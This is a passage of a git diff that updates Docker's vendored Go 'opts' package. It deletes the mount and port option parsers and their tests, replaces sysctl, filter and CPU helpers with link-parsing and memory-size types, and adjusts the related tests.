@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"net"
diff --git a/vendor/github.com/docker/docker/opts/mount.go b/vendor/github.com/docker/docker/opts/mount.go
deleted file mode 100644
index ce6383ddca..0000000000
--- a/vendor/github.com/docker/docker/opts/mount.go
+++ /dev/null
@@ -1,171 +0,0 @@
-package opts
-
-import (
-	"encoding/csv"
-	"fmt"
-	"os"
-	"strconv"
-	"strings"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-	"github.com/docker/go-units"
-)
-
-// MountOpt is a Value type for parsing mounts
-type MountOpt struct {
-	values []mounttypes.Mount
-}
-
-// Set a new mount value
-func (m *MountOpt) Set(value string) error {
-	csvReader := csv.NewReader(strings.NewReader(value))
-	fields, err := csvReader.Read()
-	if err != nil {
-		return err
-	}
-
-	mount := mounttypes.Mount{}
-
-	volumeOptions := func() *mounttypes.VolumeOptions {
-		if mount.VolumeOptions == nil {
-			mount.VolumeOptions = &mounttypes.VolumeOptions{
-				Labels: make(map[string]string),
-			}
-		}
-		if mount.VolumeOptions.DriverConfig == nil {
-			mount.VolumeOptions.DriverConfig = &mounttypes.Driver{}
-		}
-		return mount.VolumeOptions
-	}
-
-	bindOptions := func() *mounttypes.BindOptions {
-		if mount.BindOptions == nil {
-			mount.BindOptions = new(mounttypes.BindOptions)
-		}
-		return mount.BindOptions
-	}
-
-	tmpfsOptions := func() *mounttypes.TmpfsOptions {
-		if mount.TmpfsOptions == nil {
-			mount.TmpfsOptions = new(mounttypes.TmpfsOptions)
-		}
-		return mount.TmpfsOptions
-	}
-
-	setValueOnMap := func(target map[string]string, value string) {
-		parts := strings.SplitN(value, "=", 2)
-		if len(parts) == 1 {
-			target[value] = ""
-		} else {
-			target[parts[0]] = parts[1]
-		}
-	}
-
-	mount.Type = mounttypes.TypeVolume // default to volume mounts
-	// Set writable as the default
-	for _, field := range fields {
-		parts := strings.SplitN(field, "=", 2)
-		key := strings.ToLower(parts[0])
-
-		if len(parts) == 1 {
-			switch key {
-			case "readonly", "ro":
-				mount.ReadOnly = true
-				continue
-			case "volume-nocopy":
-				volumeOptions().NoCopy = true
-				continue
-			}
-		}
-
-		if len(parts) != 2 {
-			return fmt.Errorf("invalid field '%s' must be a key=value pair", field)
-		}
-
-		value := parts[1]
-		switch key {
-		case "type":
-			mount.Type = mounttypes.Type(strings.ToLower(value))
-		case "source", "src":
-			mount.Source = value
-		case "target", "dst", "destination":
-			mount.Target = value
-		case "readonly", "ro":
-			mount.ReadOnly, err = strconv.ParseBool(value)
-			if err != nil {
-				return fmt.Errorf("invalid value for %s: %s", key, value)
-			}
-		case "bind-propagation":
-			bindOptions().Propagation = mounttypes.Propagation(strings.ToLower(value))
-		case "volume-nocopy":
-			volumeOptions().NoCopy, err = strconv.ParseBool(value)
-			if err != nil {
-				return fmt.Errorf("invalid value for populate: %s", value)
-			}
-		case "volume-label":
-			setValueOnMap(volumeOptions().Labels, value)
-		case "volume-driver":
-			volumeOptions().DriverConfig.Name = value
-		case "volume-opt":
-			if volumeOptions().DriverConfig.Options == nil {
-				volumeOptions().DriverConfig.Options = make(map[string]string)
-			}
-			setValueOnMap(volumeOptions().DriverConfig.Options, value)
-		case "tmpfs-size":
-			sizeBytes, err := units.RAMInBytes(value)
-			if err != nil {
-				return fmt.Errorf("invalid value for %s: %s", key, value)
-			}
-			tmpfsOptions().SizeBytes = sizeBytes
-		case "tmpfs-mode":
-			ui64, err := strconv.ParseUint(value, 8, 32)
-			if err != nil {
-				return fmt.Errorf("invalid value for %s: %s", key, value)
-			}
-			tmpfsOptions().Mode = os.FileMode(ui64)
-		default:
-			return fmt.Errorf("unexpected key '%s' in '%s'", key, field)
-		}
-	}
-
-	if mount.Type == "" {
-		return fmt.Errorf("type is required")
-	}
-
-	if mount.Target == "" {
-		return fmt.Errorf("target is required")
-	}
-
-	if mount.VolumeOptions != nil && mount.Type != mounttypes.TypeVolume {
-		return fmt.Errorf("cannot mix 'volume-*' options with mount type '%s'", mount.Type)
-	}
-	if mount.BindOptions != nil && mount.Type != mounttypes.TypeBind {
-		return fmt.Errorf("cannot mix 'bind-*' options with mount type '%s'", mount.Type)
-	}
-	if mount.TmpfsOptions != nil && mount.Type != mounttypes.TypeTmpfs {
-		return fmt.Errorf("cannot mix 'tmpfs-*' options with mount type '%s'", mount.Type)
-	}
-
-	m.values = append(m.values, mount)
-	return nil
-}
-
-// Type returns the type of this option
-func (m *MountOpt) Type() string {
-	return "mount"
-}
-
-// String returns a string repr of this option
-func (m *MountOpt) String() string {
-	mounts := []string{}
-	for _, mount := range m.values {
-		repr := fmt.Sprintf("%s %s %s", mount.Type, mount.Source, mount.Target)
-		mounts = append(mounts, repr)
-	}
-	return strings.Join(mounts, ", ")
-}
-
-// Value returns the mounts
-func (m *MountOpt) Value() []mounttypes.Mount {
-	return m.values
-}
diff --git a/vendor/github.com/docker/docker/opts/mount_test.go b/vendor/github.com/docker/docker/opts/mount_test.go
deleted file mode 100644
index 59606c38e2..0000000000
--- a/vendor/github.com/docker/docker/opts/mount_test.go
+++ /dev/null
@@ -1,184 +0,0 @@
-package opts
-
-import (
-	"os"
-	"testing"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestMountOptString(t *testing.T) {
-	mount := MountOpt{
-		values: []mounttypes.Mount{
-			{
-				Type:   mounttypes.TypeBind,
-				Source: "/home/path",
-				Target: "/target",
-			},
-			{
-				Type:   mounttypes.TypeVolume,
-				Source: "foo",
-				Target: "/target/foo",
-			},
-		},
-	}
-	expected := "bind /home/path /target, volume foo /target/foo"
-	assert.Equal(t, mount.String(), expected)
-}
-
-func TestMountOptSetBindNoErrorBind(t *testing.T) {
-	for _, testcase := range []string{
-		// tests several aliases that should have same result.
-		"type=bind,target=/target,source=/source",
-		"type=bind,src=/source,dst=/target",
-		"type=bind,source=/source,dst=/target",
-		"type=bind,src=/source,target=/target",
-	} {
-		var mount MountOpt
-
-		assert.NilError(t, mount.Set(testcase))
-
-		mounts := mount.Value()
-		assert.Equal(t, len(mounts), 1)
-		assert.Equal(t, mounts[0], mounttypes.Mount{
-			Type:   mounttypes.TypeBind,
-			Source: "/source",
-			Target: "/target",
-		})
-	}
-}
-
-func TestMountOptSetVolumeNoError(t *testing.T) {
-	for _, testcase := range []string{
-		// tests several aliases that should have same result.
-		"type=volume,target=/target,source=/source",
-		"type=volume,src=/source,dst=/target",
-		"type=volume,source=/source,dst=/target",
-		"type=volume,src=/source,target=/target",
-	} {
-		var mount MountOpt
-
-		assert.NilError(t, mount.Set(testcase))
-
-		mounts := mount.Value()
-		assert.Equal(t, len(mounts), 1)
-		assert.Equal(t, mounts[0], mounttypes.Mount{
-			Type:   mounttypes.TypeVolume,
-			Source: "/source",
-			Target: "/target",
-		})
-	}
-}
-
-// TestMountOptDefaultType ensures that a mount without the type defaults to a
-// volume mount.
-func TestMountOptDefaultType(t *testing.T) {
-	var mount MountOpt
-	assert.NilError(t, mount.Set("target=/target,source=/foo"))
-	assert.Equal(t, mount.values[0].Type, mounttypes.TypeVolume)
-}
-
-func TestMountOptSetErrorNoTarget(t *testing.T) {
-	var mount MountOpt
-	assert.Error(t, mount.Set("type=volume,source=/foo"), "target is required")
-}
-
-func TestMountOptSetErrorInvalidKey(t *testing.T) {
-	var mount MountOpt
-	assert.Error(t, mount.Set("type=volume,bogus=foo"), "unexpected key 'bogus'")
-}
-
-func TestMountOptSetErrorInvalidField(t *testing.T) {
-	var mount MountOpt
-	assert.Error(t, mount.Set("type=volume,bogus"), "invalid field 'bogus'")
-}
-
-func TestMountOptSetErrorInvalidReadOnly(t *testing.T) {
-	var mount MountOpt
-	assert.Error(t, mount.Set("type=volume,readonly=no"), "invalid value for readonly: no")
-	assert.Error(t, mount.Set("type=volume,readonly=invalid"), "invalid value for readonly: invalid")
-}
-
-func TestMountOptDefaultEnableReadOnly(t *testing.T) {
-	var m MountOpt
-	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo"))
-	assert.Equal(t, m.values[0].ReadOnly, false)
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly"))
-	assert.Equal(t, m.values[0].ReadOnly, true)
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=1"))
-	assert.Equal(t, m.values[0].ReadOnly, true)
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=true"))
-	assert.Equal(t, m.values[0].ReadOnly, true)
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=0"))
-	assert.Equal(t, m.values[0].ReadOnly, false)
-}
-
-func TestMountOptVolumeNoCopy(t *testing.T) {
-	var m MountOpt
-	assert.NilError(t, m.Set("type=volume,target=/foo,volume-nocopy"))
-	assert.Equal(t, m.values[0].Source, "")
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo"))
-	assert.Equal(t, m.values[0].VolumeOptions == nil, true)
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=true"))
-	assert.Equal(t, m.values[0].VolumeOptions != nil, true)
-	assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true)
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy"))
-	assert.Equal(t, m.values[0].VolumeOptions != nil, true)
-	assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true)
-
-	m = MountOpt{}
-	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=1"))
-	assert.Equal(t, m.values[0].VolumeOptions != nil, true)
-	assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true)
-}
-
-func TestMountOptTypeConflict(t *testing.T) {
-	var m MountOpt
-	assert.Error(t, m.Set("type=bind,target=/foo,source=/foo,volume-nocopy=true"), "cannot mix")
-	assert.Error(t, m.Set("type=volume,target=/foo,source=/foo,bind-propagation=rprivate"), "cannot mix")
-}
-
-func TestMountOptSetTmpfsNoError(t *testing.T) {
-	for _, testcase := range []string{
-		// tests several aliases that should have same result.
-		"type=tmpfs,target=/target,tmpfs-size=1m,tmpfs-mode=0700",
-		"type=tmpfs,target=/target,tmpfs-size=1MB,tmpfs-mode=700",
-	} {
-		var mount MountOpt
-
-		assert.NilError(t, mount.Set(testcase))
-
-		mounts := mount.Value()
-		assert.Equal(t, len(mounts), 1)
-		assert.DeepEqual(t, mounts[0], mounttypes.Mount{
-			Type:   mounttypes.TypeTmpfs,
-			Target: "/target",
-			TmpfsOptions: &mounttypes.TmpfsOptions{
-				SizeBytes: 1024 * 1024, // not 1000 * 1000
-				Mode:      os.FileMode(0700),
-			},
-		})
-	}
-}
-
-func TestMountOptSetTmpfsError(t *testing.T) {
-	var m MountOpt
-	assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-size=foo"), "invalid value for tmpfs-size")
-	assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-mode=foo"), "invalid value for tmpfs-mode")
-	assert.Error(t, m.Set("type=tmpfs"), "target is required")
-}
diff --git a/vendor/github.com/docker/docker/opts/opts.go b/vendor/github.com/docker/docker/opts/opts.go
index ae851537ec..de8aacb806 100644
--- a/vendor/github.com/docker/docker/opts/opts.go
+++ b/vendor/github.com/docker/docker/opts/opts.go
@@ -1,13 +1,13 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"fmt"
-	"math/big"
 	"net"
+	"path"
 	"regexp"
 	"strings"
 
-	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/go-units"
 )
 
 var (
@@ -36,7 +36,10 @@ func NewListOptsRef(values *[]string, validator ValidatorFctType) *ListOpts {
 }
 
 func (opts *ListOpts) String() string {
-	return fmt.Sprintf("%v", []string((*opts.values)))
+	if len(*opts.values) == 0 {
+		return ""
+	}
+	return fmt.Sprintf("%v", *opts.values)
 }
 
 // Set validates if needed the input value and adds it to the
@@ -49,7 +52,7 @@ func (opts *ListOpts) Set(value string) error {
 		}
 		value = v
 	}
-	(*opts.values) = append((*opts.values), value)
+	*opts.values = append(*opts.values, value)
 	return nil
 }
 
@@ -57,7 +60,7 @@ func (opts *ListOpts) Set(value string) error {
 func (opts *ListOpts) Delete(key string) {
 	for i, k := range *opts.values {
 		if k == key {
-			(*opts.values) = append((*opts.values)[:i], (*opts.values)[i+1:]...)
+			*opts.values = append((*opts.values)[:i], (*opts.values)[i+1:]...)
 			return
 		}
 	}
@@ -75,7 +78,7 @@ func (opts *ListOpts) GetMap() map[string]struct{} {
 
 // GetAll returns the values of slice.
 func (opts *ListOpts) GetAll() []string {
-	return (*opts.values)
+	return *opts.values
 }
 
 // GetAllOrEmpty returns the values of the slice
@@ -100,7 +103,7 @@ func (opts *ListOpts) Get(key string) bool {
 
 // Len returns the amount of element in the slice.
 func (opts *ListOpts) Len() int {
-	return len((*opts.values))
+	return len(*opts.values)
 }
 
 // Type returns a string name for this Option type
@@ -108,6 +111,12 @@ func (opts *ListOpts) Type() string {
 	return "list"
 }
 
+// WithValidator returns the ListOpts with validator set.
+func (opts *ListOpts) WithValidator(validator ValidatorFctType) *ListOpts {
+	opts.validator = validator
+	return opts
+}
+
 // NamedOption is an interface that list and map options
 // with names implement.
 type NamedOption interface {
@@ -168,7 +177,7 @@ func (opts *MapOpts) GetAll() map[string]string {
 }
 
 func (opts *MapOpts) String() string {
-	return fmt.Sprintf("%v", map[string]string((opts.values)))
+	return fmt.Sprintf("%v", opts.values)
 }
 
 // Type returns a string name for this Option type
@@ -254,107 +263,75 @@ func ValidateLabel(val string) (string, error) {
 	return val, nil
 }
 
-// ValidateSysctl validates a sysctl and returns it.
-func ValidateSysctl(val string) (string, error) {
-	validSysctlMap := map[string]bool{
-		"kernel.msgmax":          true,
-		"kernel.msgmnb":          true,
-		"kernel.msgmni":          true,
-		"kernel.sem":             true,
-		"kernel.shmall":          true,
-		"kernel.shmmax":          true,
-		"kernel.shmmni":          true,
-		"kernel.shm_rmid_forced": true,
+// ValidateSingleGenericResource validates that a single entry in the
+// generic resource list is valid.
+// i.e 'GPU=UID1' is valid however 'GPU:UID1' or 'UID1' isn't
+func ValidateSingleGenericResource(val string) (string, error) {
+	if strings.Count(val, "=") < 1 {
+		return "", fmt.Errorf("invalid node-generic-resource format `%s` expected `name=value`", val)
 	}
-	validSysctlPrefixes := []string{
-		"net.",
-		"fs.mqueue.",
+	return val, nil
+}
+
+// ParseLink parses and validates the specified string as a link format (name:alias)
+func ParseLink(val string) (string, string, error) {
+	if val == "" {
+		return "", "", fmt.Errorf("empty string specified for links")
 	}
-	arr := strings.Split(val, "=")
-	if len(arr) < 2 {
-		return "", fmt.Errorf("sysctl '%s' is not whitelisted", val)
+	arr := strings.Split(val, ":")
+	if len(arr) > 2 {
+		return "", "", fmt.Errorf("bad format for links: %s", val)
 	}
-	if validSysctlMap[arr[0]] {
-		return val, nil
+	if len(arr) == 1 {
+		return val, val, nil
 	}
-
-	for _, vp := range validSysctlPrefixes {
-		if strings.HasPrefix(arr[0], vp) {
-			return val, nil
-		}
+	// This is kept because we can actually get a HostConfig with links
+	// from an already created container and the format is not `foo:bar`
+	// but `/foo:/c1/bar`
+	if strings.HasPrefix(arr[0], "/") {
+		_, alias := path.Split(arr[1])
+		return arr[0][1:], alias, nil
 	}
-	return "", fmt.Errorf("sysctl '%s' is not whitelisted", val)
+	return arr[0], arr[1], nil
 }
 
-// FilterOpt is a flag type for validating filters
-type FilterOpt struct {
-	filter filters.Args
-}
-
-// NewFilterOpt returns a new FilterOpt
-func NewFilterOpt() FilterOpt {
-	return FilterOpt{filter: filters.NewArgs()}
-}
+// MemBytes is a type for human readable memory bytes (like 128M, 2g, etc)
+type MemBytes int64
 
-func (o *FilterOpt) String() string {
-	repr, err := filters.ToParam(o.filter)
-	if err != nil {
-		return "invalid filters"
+// String returns the string format of the human readable memory bytes
+func (m *MemBytes) String() string {
+	// NOTE: In spf13/pflag/flag.go, "0" is considered as "zero value" while "0 B" is not.
+	// We return "0" in case value is 0 here so that the default value is hidden.
+	// (Sometimes "default 0 B" is actually misleading)
+	if m.Value() != 0 {
+		return units.BytesSize(float64(m.Value()))
 	}
-	return repr
+	return "0"
 }
 
-// Set sets the value of the opt by parsing the command line value
-func (o *FilterOpt) Set(value string) error {
-	var err error
-	o.filter, err = filters.ParseFlag(value, o.filter)
-	return err
-}
-
-// Type returns the option type
-func (o *FilterOpt) Type() string {
-	return "filter"
-}
-
-// Value returns the value of this option
-func (o *FilterOpt) Value() filters.Args {
-	return o.filter
-}
-
-// NanoCPUs is a type for fixed point fractional number.
-type NanoCPUs int64
-
-// String returns the string format of the number
-func (c *NanoCPUs) String() string {
-	return big.NewRat(c.Value(), 1e9).FloatString(3)
-}
-
-// Set sets the value of the NanoCPU by passing a string
-func (c *NanoCPUs) Set(value string) error {
-	cpus, err := ParseCPUs(value)
-	*c = NanoCPUs(cpus)
+// Set sets the value of the MemBytes by passing a string
+func (m *MemBytes) Set(value string) error {
+	val, err := units.RAMInBytes(value)
+	*m = MemBytes(val)
 	return err
 }
 
 // Type returns the type
-func (c *NanoCPUs) Type() string {
-	return "decimal"
+func (m *MemBytes) Type() string {
+	return "bytes"
 }
 
 // Value returns the value in int64
-func (c *NanoCPUs) Value() int64 {
-	return int64(*c)
+func (m *MemBytes) Value() int64 {
+	return int64(*m)
 }
 
-// ParseCPUs takes a string ratio and returns an integer value of nano cpus
-func ParseCPUs(value string) (int64, error) {
-	cpu, ok := new(big.Rat).SetString(value)
-	if !ok {
-		return 0, fmt.Errorf("failed to parse %v as a rational number", value)
-	}
-	nano := cpu.Mul(cpu, big.NewRat(1e9, 1))
-	if !nano.IsInt() {
-		return 0, fmt.Errorf("value is too precise")
+// UnmarshalJSON is the customized unmarshaler for MemBytes
+func (m *MemBytes) UnmarshalJSON(s []byte) error {
+	if len(s) <= 2 || s[0] != '"' || s[len(s)-1] != '"' {
+		return fmt.Errorf("invalid size: %q", s)
 	}
-	return nano.Num().Int64(), nil
+	val, err := units.RAMInBytes(string(s[1 : len(s)-1]))
+	*m = MemBytes(val)
+	return err
 }
diff --git a/vendor/github.com/docker/docker/opts/opts_test.go b/vendor/github.com/docker/docker/opts/opts_test.go
index 9f41e47864..577395edcb 100644
--- a/vendor/github.com/docker/docker/opts/opts_test.go
+++ b/vendor/github.com/docker/docker/opts/opts_test.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"fmt"
@@ -50,7 +50,7 @@ func TestMapOpts(t *testing.T) {
 		t.Errorf("max-size = %s != 1", tmpMap["max-size"])
 	}
 	if o.Set("dummy-val=3") == nil {
-		t.Errorf("validator is not being called")
+		t.Error("validator is not being called")
 	}
 }
 
@@ -93,12 +93,12 @@ func TestListOptsWithValidator(t *testing.T) {
 	// Re-using logOptsvalidator (used by MapOpts)
 	o := NewListOpts(logOptsValidator)
 	o.Set("foo")
-	if o.String() != "[]" {
-		t.Errorf("%s != []", o.String())
+	if o.String() != "" {
+		t.Errorf(`%s != ""`, o.String())
 	}
 	o.Set("foo=bar")
-	if o.String() != "[]" {
-		t.Errorf("%s != []", o.String())
+	if o.String() != "" {
+		t.Errorf(`%s != ""`, o.String())
 	}
 	o.Set("max-file=2")
 	if o.Len() != 1 {
@@ -111,8 +111,8 @@ func TestListOptsWithValidator(t *testing.T) {
 		t.Error("o.Get(\"baz\") == true")
 	}
 	o.Delete("max-file=2")
-	if o.String() != "[]" {
-		t.Errorf("%s != []", o.String())
+	if o.String() != "" {
+		t.Errorf(`%s != ""`, o.String())
 	}
 }
 
@@ -157,7 +157,7 @@ func TestValidateDNSSearch(t *testing.T) {
 		`foo.bar-.baz`,
 		`foo.-bar`,
 		`foo.-bar.baz`,
-		`foo.bar.baz.this.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbe`,
+		`foo.bar.baz.this.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbe`,
 	}
 
 	for _, domain := range valid {
@@ -230,3 +230,35 @@ func TestNamedMapOpts(t *testing.T) {
 		t.Errorf("expected map-size to be in the values, got %v", tmpMap)
 	}
 }
+
+func TestParseLink(t *testing.T) {
+	name, alias, err := ParseLink("name:alias")
+	if err != nil {
+		t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err)
+	}
+	if name != "name" {
+		t.Fatalf("Link name should have been name, got %s instead", name)
+	}
+	if alias != "alias" {
+		t.Fatalf("Link alias should have been alias, got %s instead", alias)
+	}
+	// short format definition
+	name, alias, err = ParseLink("name")
+	if err != nil {
+		t.Fatalf("Expected not to error out on a valid name only format but got: %v", err)
+	}
+	if name != "name" {
+		t.Fatalf("Link name should have been name, got %s instead", name)
+	}
+	if alias != "name" {
+		t.Fatalf("Link alias should have been name, got %s instead", alias)
+	}
+	// empty string link definition is not allowed
+	if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") {
+		t.Fatalf("Expected error 'empty string specified for links' but got: %v", err)
+	}
+	// more than two colons are not allowed
+	if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") {
+		t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/opts_unix.go b/vendor/github.com/docker/docker/opts/opts_unix.go
index f1ce844a8f..0c32367cb2 100644
--- a/vendor/github.com/docker/docker/opts/opts_unix.go
+++ b/vendor/github.com/docker/docker/opts/opts_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package opts
+package opts // import "github.com/docker/docker/opts"
 
-// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080
+// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. dockerd -H tcp://:8080
 const DefaultHTTPHost = "localhost"
diff --git a/vendor/github.com/docker/docker/opts/opts_windows.go b/vendor/github.com/docker/docker/opts/opts_windows.go
index ebe40c969c..0e1b6c6d18 100644
--- a/vendor/github.com/docker/docker/opts/opts_windows.go
+++ b/vendor/github.com/docker/docker/opts/opts_windows.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 // TODO Windows. Identify bug in GOLang 1.5.1+ and/or Windows Server 2016 TP5.
 // @jhowardmsft, @swernli.
@@ -52,5 +52,5 @@ package opts
 // to the delay if a user were to do 'docker run -H=tcp://localhost:2375...'
 // explicitly.
 
-// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080
+// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. dockerd -H tcp://:8080
 const DefaultHTTPHost = "127.0.0.1"
diff --git a/vendor/github.com/docker/docker/opts/port.go b/vendor/github.com/docker/docker/opts/port.go
deleted file mode 100644
index 020a5d1e1c..0000000000
--- a/vendor/github.com/docker/docker/opts/port.go
+++ /dev/null
@@ -1,146 +0,0 @@
-package opts
-
-import (
-	"encoding/csv"
-	"fmt"
-	"regexp"
-	"strconv"
-	"strings"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/go-connections/nat"
-)
-
-const (
-	portOptTargetPort    = "target"
-	portOptPublishedPort = "published"
-	portOptProtocol      = "protocol"
-	portOptMode          = "mode"
-)
-
-// PortOpt represents a port config in swarm mode.
-type PortOpt struct {
-	ports []swarm.PortConfig
-}
-
-// Set a new port value
-func (p *PortOpt) Set(value string) error {
-	longSyntax, err := regexp.MatchString(`\w+=\w+(,\w+=\w+)*`, value)
-	if err != nil {
-		return err
-	}
-	if longSyntax {
-		csvReader := csv.NewReader(strings.NewReader(value))
-		fields, err := csvReader.Read()
-		if err != nil {
-			return err
-		}
-
-		pConfig := swarm.PortConfig{}
-		for _, field := range fields {
-			parts := strings.SplitN(field, "=", 2)
-			if len(parts) != 2 {
-				return fmt.Errorf("invalid field %s", field)
-			}
-
-			key := strings.ToLower(parts[0])
-			value := strings.ToLower(parts[1])
-
-			switch key {
-			case portOptProtocol:
-				if value != string(swarm.PortConfigProtocolTCP) && value != string(swarm.PortConfigProtocolUDP) {
-					return fmt.Errorf("invalid protocol value %s", value)
-				}
-
-				pConfig.Protocol = swarm.PortConfigProtocol(value)
-			case portOptMode:
-				if value != string(swarm.PortConfigPublishModeIngress) && value != string(swarm.PortConfigPublishModeHost) {
-					return fmt.Errorf("invalid publish mode value %s", value)
-				}
-
-				pConfig.PublishMode = swarm.PortConfigPublishMode(value)
-			case portOptTargetPort:
-				tPort, err := strconv.ParseUint(value, 10, 16)
-				if err != nil {
-					return err
-				}
-
-				pConfig.TargetPort = uint32(tPort)
-			case portOptPublishedPort:
-				pPort, err := strconv.ParseUint(value, 10, 16)
-				if err != nil {
-					return err
-				}
-
-				pConfig.PublishedPort = uint32(pPort)
-			default:
-				return fmt.Errorf("invalid field key %s", key)
-			}
-		}
-
-		if pConfig.TargetPort == 0 {
-			return fmt.Errorf("missing mandatory field %q", portOptTargetPort)
-		}
-
-		if pConfig.PublishMode == "" {
-			pConfig.PublishMode = swarm.PortConfigPublishModeIngress
-		}
-
-		if pConfig.Protocol == "" {
-			pConfig.Protocol = swarm.PortConfigProtocolTCP
-		}
-
-		p.ports = append(p.ports, pConfig)
-	} else {
-		// short syntax
-		portConfigs := []swarm.PortConfig{}
-		// We can ignore errors because the format was already validated by ValidatePort
-		ports, portBindings, _ := nat.ParsePortSpecs([]string{value})
-
-		for port := range ports {
-			portConfigs = append(portConfigs, ConvertPortToPortConfig(port, portBindings)...)
-		}
-		p.ports = append(p.ports, portConfigs...)
-	}
-	return nil
-}
-
-// Type returns the type of this option
-func (p *PortOpt) Type() string {
-	return "port"
-}
-
-// String returns a string repr of this option
-func (p *PortOpt) String() string {
-	ports := []string{}
-	for _, port := range p.ports {
-		repr := fmt.Sprintf("%v:%v/%s/%s", port.PublishedPort, port.TargetPort, port.Protocol, port.PublishMode)
-		ports = append(ports, repr)
-	}
-	return strings.Join(ports, ", ")
-}
-
-// Value returns the ports
-func (p *PortOpt) Value() []swarm.PortConfig {
-	return p.ports
-}
-
-// ConvertPortToPortConfig converts ports to the swarm type
-func ConvertPortToPortConfig(
-	port nat.Port,
-	portBindings map[nat.Port][]nat.PortBinding,
-) []swarm.PortConfig {
-	ports := []swarm.PortConfig{}
-
-	for _, binding := range portBindings[port] {
-		hostPort, _ := strconv.ParseUint(binding.HostPort, 10, 16)
-		ports = append(ports, swarm.PortConfig{
-			//TODO Name: ?
-			Protocol:      swarm.PortConfigProtocol(strings.ToLower(port.Proto())),
-			TargetPort:    uint32(port.Int()),
-			PublishedPort: uint32(hostPort),
-			PublishMode:   swarm.PortConfigPublishModeIngress,
-		})
-	}
-	return ports
-}
diff --git a/vendor/github.com/docker/docker/opts/port_test.go b/vendor/github.com/docker/docker/opts/port_test.go
deleted file mode 100644
index 67bcf8f1d9..0000000000
--- a/vendor/github.com/docker/docker/opts/port_test.go
+++ /dev/null
@@ -1,259 +0,0 @@
-package opts
-
-import (
-	"testing"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestPortOptValidSimpleSyntax(t *testing.T) {
-	testCases := []struct {
-		value    string
-		expected []swarm.PortConfig
-	}{
-		{
-			value: "80",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:    "tcp",
-					TargetPort:  80,
-					PublishMode: swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "80:8080",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "tcp",
-					TargetPort:    8080,
-					PublishedPort: 80,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "8080:80/tcp",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "tcp",
-					TargetPort:    80,
-					PublishedPort: 8080,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "80:8080/udp",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "udp",
-					TargetPort:    8080,
-					PublishedPort: 80,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "80-81:8080-8081/tcp",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "tcp",
-					TargetPort:    8080,
-					PublishedPort: 80,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-				{
-					Protocol:      "tcp",
-					TargetPort:    8081,
-					PublishedPort: 81,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "80-82:8080-8082/udp",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "udp",
-					TargetPort:    8080,
-					PublishedPort: 80,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-				{
-					Protocol:      "udp",
-					TargetPort:    8081,
-					PublishedPort: 81,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-				{
-					Protocol:      "udp",
-					TargetPort:    8082,
-					PublishedPort: 82,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-	}
-	for _, tc := range testCases {
-		var port PortOpt
-		assert.NilError(t, port.Set(tc.value))
